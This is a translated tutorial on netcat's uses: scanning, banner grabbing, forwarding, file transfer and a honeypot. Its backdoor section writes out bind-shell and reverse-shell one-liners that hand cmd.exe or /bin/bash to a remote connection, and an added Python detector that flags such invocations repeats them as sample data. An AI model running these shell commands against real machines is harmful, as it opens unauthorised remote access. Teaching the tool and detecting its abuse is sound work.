Netcat: the TCP/IP Swiss Army knife
- Chat
- Port scanning
- Banner grabbing
- Port forwarding / proxying
- File transfer
- Honeypot
- RAT / backdoor
Let's start by looking at netcat's help:
root@bt:~# nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
Chatting with netcat:
Machine A (BT): root@bt:~# nc -l -p 123
Machine B (Windows): C:\> nc 192.168.118.130 123
Port scanning:
Netcat is not a particularly good port scanner compared with dedicated tools, but it is still worth covering.
C:\> nc -v -w 2 -z 192.168.118.130 1-100
Banner grabbing:
C:\> nc -vv 192.168.118.130 80
Probing port 80 on host 192.168.118.130 this way returned the web server header Apache/2.2.14 (shown in the original screenshot).
Port forwarding:
This comes in handy when a firewall restricts access to a port.
Machine A: root@bt:~# nc -l -p 8008 -c "nc google.com 80"
Machine B: browse to 192.168.118.130:8008
File transfer:
Machine A: root@bt:~# nc -lv -p 123 > test.txt
Machine B: C:\> nc 192.168.118.130 123 < test1.txt
Honeypot:
You can build a simple honeypot with netcat.
Machine A: root@bt:~# nc -lvvp 443 < apache2.txt
Machine B: C:\> nc 192.168.118.130 443
Backdoor:
1. Binding a port on Windows
Machine B: C:\> nc -lvvp 1234 -e cmd.exe [listen on port 1234 and hand the connection to cmd.exe]
Machine A: root@bt:~# nc -v 192.168.118.1 1234 [connect to port 1234]
2. Reverse shell
Machine B: C:\> nc -lvvp 1234
Machine A: root@bt:~# nc -v 192.168.118.1 1234 -e /bin/bash
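The -e and -c options in the backdoor and port-forwarding commands above are exactly the ones netcat's own help marks [dangerous!!], so a process-monitoring rule can key on them. The following detector is an added example, not code from the original post or the InfoSec Institute article it translates: it parses process command lines (clustered flags such as -lvvp included), flags any nc/ncat-family invocation using -e, -c, --exec or --sh-exec, and classifies it as bind (listens, then execs) or reverse (connects out, then execs); the sample command lines are constructed from the page's own commands, and the Ncat long options are assumed from Ncat's documentation.

```python
import re
import shlex
NETCAT_NAMES = {"nc", "netcat", "ncat", "cryptcat", "nc.exe", "ncat.exe"}
EXEC_SHORT = {"e", "c"}              # -e program / -c shell command (nc and ncat)
EXEC_LONG = {"--exec", "--sh-exec"}  # Ncat's long spellings (assumed from Ncat docs)
ARG_SHORT = set("ecgGiopqsTw")       # nc short options that consume an argument

def analyze(cmdline):
    # Finding dict when a netcat-family binary runs with an exec option, else None.
    argv = shlex.split(cmdline, posix=False)  # non-POSIX: keeps Windows backslashes
    if not argv:
        return None
    prog = re.split(r"[\\/]", argv[0].strip("\"'"))[-1].lower()
    if prog not in NETCAT_NAMES:
        return None
    listen, finding, i = False, None, 1
    while i < len(argv):
        tok = argv[i]
        opt, eq, val = tok.partition("=")
        if opt in EXEC_LONG:
            if not eq and i + 1 < len(argv):          # value is the next argument
                i, val = i + 1, argv[i + 1]
            finding = finding or (opt, val)
        elif tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            cluster = tok[1:]                         # getopt-style cluster, e.g. lvvp
            listen = listen or "l" in cluster
            for j, ch in enumerate(cluster):
                if ch in ARG_SHORT:  # value: rest of the cluster, else next argument
                    val = cluster[j + 1:]
                    if not val and i + 1 < len(argv):
                        i, val = i + 1, argv[i + 1]
                    if ch in EXEC_SHORT:
                        finding = finding or ("-" + ch, val)
                    break
        i += 1
    if finding is None:
        return None
    # bind = listens then execs (the "bind a port" case); reverse = connects then execs.
    return {"option": finding[0], "target": finding[1].strip("\"'"),
            "listen": listen, "mode": "bind" if listen else "reverse"}

SAMPLE_CMDLINES = [  # constructed from the page's own invocations
    "nc -l -p 123",
    "nc -v -w 2 -z 192.168.118.130 1-100",
    "nc -lvvp 1234 -e cmd.exe",
    "nc -v 192.168.118.1 1234 -e /bin/bash",
    'nc -l -p 8008 -c "nc google.com 80"',
]

def scan(cmdlines):  # [(cmdline, finding)] for every line that should alert
    return [(line, f) for line in cmdlines for f in [analyze(line)] if f]
```

Note that the -c port forwarder is flagged alongside the two shells: the option is the same, and a defender wants to see it either way.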
A few enhanced netcat variants:
1. cryptcat, an encrypted netcat (http://sourceforge.net/projects/cryptcat/files/)
2. Ncat, a netcat for the 21st century and part of the Nmap suite (http://www.oschina.net/p/ncat/)
Transferring a file over SSL with Ncat:
Machine A: root@bt:~# ncat -l --ssl 123 > Ncattest.txt
Machine B: C:\> ncat 192.168.118.130 123 --ssl < test2.txt
3. socat, a replacement for netcat (nc) that could be called nc++ (http://www.oschina.net/p/socat/)
Translated and adapted from: http://resources.infosecinstitute.com/netcat-tcpip-swiss-army-knife/